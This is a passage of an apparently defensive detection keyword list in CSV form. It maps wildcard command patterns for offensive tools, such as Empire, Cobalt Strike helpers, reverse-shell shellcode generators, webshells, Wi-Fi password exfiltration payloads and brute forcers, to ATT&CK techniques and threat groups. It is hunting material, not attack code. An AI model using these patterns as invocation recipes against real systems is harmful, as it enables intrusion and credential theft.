Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* impress-remote-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -inc -u=0 *.pwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -inc=digits *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* inceptor.*dotnet*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.spec*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --includeModules 
amass*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -InFile Wi-Fi-PASS*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* informix-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* informix-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* informix-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Injector NtMapViewOfSection*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* -Injector VirtualAllocEx*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* --input 10m_usernames.txt*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -* -InputPath .\TrustedForests.txt*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,0,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -* instabf.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -* instainsane.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for 
termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,0,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -* install *masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -* install armitage*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,0,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -* install autobloody*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -* install backdoor-factory*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* install chisel*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -* install 
evil-winrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* install github *merlin*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -* install hekatomb*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -* install holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -* install krbjack*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* install nikto*,offensive_tool_keyword,nikto,Nikto web server 
scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -* install wapiti3*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -* install wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* install wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* install-sb.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* insTof.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -* intel -d * -whois*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* interact -u http*://*/*.aspx -p *,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - 
TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,0,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -* --interface * --analyze --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --interface * --analyze --lm --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -Internalmonologue -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* Inveigh-*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* invoke admin-service -q *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke admin-service -q *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke query *FROM SMS_Admin*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke_sessiongopher*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* invoke_vnc*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --ip * --port * --type cmd --language *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -* -ip * -smb2support *lwpshare* ,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -IP * 
-SpooferIP * -HTTP N*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* --ip * --variable shellcode *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -* ip-forwarding.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-geoplugin.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-ipinfodb.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-bing.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-google.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-map-kml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-geolocation-maxmind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ip-https-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipidseq.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-cipher-zero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipmi-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ipv6-multicast-mld-list.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* 